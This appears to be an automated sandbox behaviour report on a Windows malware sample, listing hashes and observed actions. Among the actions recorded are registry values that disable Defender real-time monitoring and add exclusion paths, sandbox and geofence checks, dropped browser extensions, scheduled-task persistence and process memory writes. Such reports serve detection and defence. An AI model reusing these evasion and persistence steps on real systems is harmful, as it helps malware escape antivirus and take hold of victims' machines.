Analysis
-
max time kernel
116s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
19/11/2023, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe
Resource
win7-20231023-en
General
-
Target
3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe
-
Size
7.1MB
-
MD5
22b6fb2e97afec315c96ae35145d24d5
-
SHA1
d58e472d7e71b7e86c509b5913c3246917054966
-
SHA256
3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be
-
SHA512
91e7f6efb08117be50187a181ebf6e5ffdfa362cea905889be63b010fa89492bb0ae3710771752b9e2e4b4b38f8d5d359ce8450bf5634d3e76f5c432d4e725f0
-
SSDEEP
196608:91OeVRGMxLNyzxhshZJ+CjfKWg04aj7F0Ad:3OkRGMxLUhshSJn0BFF
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TtwSUYpchTTJbcVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\qMfgxxkvaFNxVGCk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IjchgTxaUtSoC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\abetkicELaUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rFkCZBmYGfkU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rFkCZBmYGfkU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\abetkicELaUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TtwSUYpchTTJbcVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EUszDIIxU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FncWqVonEAflrVaxqNR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\qMfgxxkvaFNxVGCk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\qMfgxxkvaFNxVGCk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FncWqVonEAflrVaxqNR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IjchgTxaUtSoC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\qMfgxxkvaFNxVGCk = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EUszDIIxU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2036 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Control Panel\International\Geo\Nation nYdlgIy.exe -
Executes dropped EXE 4 IoCs
pid Process 2612 Install.exe 2572 Install.exe 2324 qazedFF.exe 2452 nYdlgIy.exe -
Loads dropped DLL 12 IoCs
pid Process 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 2612 Install.exe 2612 Install.exe 2612 Install.exe 2612 Install.exe 2572 Install.exe 2572 Install.exe 2572 Install.exe 2036 rundll32.exe 2036 rundll32.exe 2036 rundll32.exe 2036 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json nYdlgIy.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json nYdlgIy.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 nYdlgIy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B nYdlgIy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini qazedFF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nYdlgIy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 nYdlgIy.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nYdlgIy.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol qazedFF.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 nYdlgIy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B nYdlgIy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol qazedFF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat nYdlgIy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nYdlgIy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nYdlgIy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nYdlgIy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 nYdlgIy.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\FncWqVonEAflrVaxqNR\tbFuxya.dll nYdlgIy.exe File created C:\Program Files (x86)\rFkCZBmYGfkU2\agqJRfp.xml nYdlgIy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja nYdlgIy.exe File created C:\Program Files (x86)\EUszDIIxU\CkQMJih.xml nYdlgIy.exe File created C:\Program Files (x86)\rFkCZBmYGfkU2\kQaVyucGwnYfF.dll nYdlgIy.exe File created C:\Program Files (x86)\FncWqVonEAflrVaxqNR\xBjraHV.xml nYdlgIy.exe File created C:\Program Files (x86)\IjchgTxaUtSoC\izvWqux.dll nYdlgIy.exe File created C:\Program Files (x86)\IjchgTxaUtSoC\ntyNLWt.xml nYdlgIy.exe File created C:\Program Files (x86)\abetkicELaUn\HJEnMat.dll nYdlgIy.exe File created C:\Program Files (x86)\EUszDIIxU\QVuGnf.dll nYdlgIy.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nYdlgIy.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi nYdlgIy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi nYdlgIy.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bRiKnmLOZFdkMPGuzv.job schtasks.exe File created C:\Windows\Tasks\ULPYamQDIjWIhTUbi.job schtasks.exe File created C:\Windows\Tasks\PyTaEsvcdFypYsh.job schtasks.exe File created C:\Windows\Tasks\oYgNoNeTxNTUFfDli.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2336 schtasks.exe 2332 schtasks.exe 2500 schtasks.exe 1504 schtasks.exe 940 schtasks.exe 2992 schtasks.exe 940 schtasks.exe 856 schtasks.exe 1124 schtasks.exe 2340 schtasks.exe 3032 schtasks.exe 2468 schtasks.exe 2996 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D6CFCB28-3618-4D24-8F7F-04D6C45B514E}\WpadDecision = "0" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nYdlgIy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D6CFCB28-3618-4D24-8F7F-04D6C45B514E}\b6-2b-70-ef-fc-03 nYdlgIy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-2b-70-ef-fc-03\WpadDecisionTime = 10640663861ada01 nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings nYdlgIy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nYdlgIy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D6CFCB28-3618-4D24-8F7F-04D6C45B514E} nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates nYdlgIy.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs nYdlgIy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-2b-70-ef-fc-03\WpadDecision = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix nYdlgIy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-2b-70-ef-fc-03\WpadDecision = "0" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D6CFCB28-3618-4D24-8F7F-04D6C45B514E}\WpadDecisionTime = 10640663861ada01 nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-2b-70-ef-fc-03 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0089000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nYdlgIy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-2b-70-ef-fc-03\WpadDecisionReason = "1" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D6CFCB28-3618-4D24-8F7F-04D6C45B514E}\b6-2b-70-ef-fc-03 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-2b-70-ef-fc-03\WpadDecisionTime = 10640663861ada01 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad nYdlgIy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D6CFCB28-3618-4D24-8F7F-04D6C45B514E}\WpadDecisionReason = "1" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-2b-70-ef-fc-03 nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust nYdlgIy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA nYdlgIy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust nYdlgIy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 nYdlgIy.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1464 powershell.EXE 1464 powershell.EXE 1464 powershell.EXE 1996 powershell.EXE 1996 powershell.EXE 1996 powershell.EXE 956 powershell.EXE 956 powershell.EXE 956 powershell.EXE 948 powershell.EXE 948 powershell.EXE 948 powershell.EXE 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe 2452 nYdlgIy.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1464 powershell.EXE Token: SeDebugPrivilege 1996 powershell.EXE Token: SeDebugPrivilege 956 powershell.EXE Token: SeDebugPrivilege 948 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2720 wrote to memory of 2612 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 28 PID 2720 wrote to memory of 2612 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 28 PID 2720 wrote to memory of 2612 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 28 PID 2720 wrote to memory of 2612 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 28 PID 2720 wrote to memory of 2612 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 28 PID 2720 wrote to memory of 2612 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 28 PID 2720 wrote to memory of 2612 2720 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 28 PID 2612 wrote to memory of 2572 2612 Install.exe 29 PID 2612 wrote to memory of 2572 2612 Install.exe 29 PID 2612 wrote to memory of 2572 2612 Install.exe 29 PID 2612 wrote to memory of 2572 2612 Install.exe 29 PID 2612 wrote to memory of 2572 2612 Install.exe 29 PID 2612 wrote to memory of 2572 2612 Install.exe 29 PID 2612 wrote to memory of 2572 2612 Install.exe 29 PID 2572 wrote to memory of 2456 2572 Install.exe 31 PID 2572 wrote to memory of 2456 2572 Install.exe 31 PID 2572 wrote to memory of 2456 2572 Install.exe 31 PID 2572 wrote to memory of 2456 2572 Install.exe 31 PID 2572 wrote to memory of 2456 2572 Install.exe 31 PID 2572 wrote to memory of 2456 2572 Install.exe 31 PID 2572 wrote to memory of 2456 2572 Install.exe 31 PID 2572 wrote to memory of 2480 2572 Install.exe 33 PID 2572 wrote to memory of 2480 2572 Install.exe 33 PID 2572 wrote to memory of 2480 2572 Install.exe 33 PID 2572 wrote to memory of 2480 2572 Install.exe 33 PID 2572 wrote to memory of 2480 2572 Install.exe 33 PID 2572 wrote to memory of 2480 2572 Install.exe 33 PID 2572 wrote to memory of 2480 2572 Install.exe 33 PID 2456 wrote to memory of 2484 2456 forfiles.exe 35 PID 2456 wrote to memory of 2484 2456 forfiles.exe 35 PID 2456 wrote to memory of 2484 2456 forfiles.exe 35 PID 2456 wrote to memory of 2484 2456 forfiles.exe 35 PID 2456 wrote to memory of 2484 2456 forfiles.exe 35 PID 2456 wrote to memory of 2484 2456 forfiles.exe 35 PID 2456 wrote to memory of 2484 2456 forfiles.exe 35 PID 2480 wrote to memory of 2508 2480 forfiles.exe 36 PID 2480 wrote to memory of 2508 2480 forfiles.exe 36 PID 2480 wrote to memory of 2508 2480 forfiles.exe 36 PID 2480 wrote to memory of 2508 2480 forfiles.exe 36 PID 2480 wrote to memory of 2508 2480 forfiles.exe 36 PID 2480 wrote to memory of 2508 2480 forfiles.exe 36 PID 2480 wrote to memory of 2508 2480 forfiles.exe 36 PID 2508 wrote to memory of 2548 2508 cmd.exe 38 PID 2508 wrote to memory of 2548 2508 cmd.exe 38 PID 2508 wrote to memory of 2548 2508 cmd.exe 38 PID 2508 wrote to memory of 2548 2508 cmd.exe 38 PID 2508 wrote to memory of 2548 2508 cmd.exe 38 PID 2508 wrote to memory of 2548 2508 cmd.exe 38 PID 2508 wrote to memory of 2548 2508 cmd.exe 38 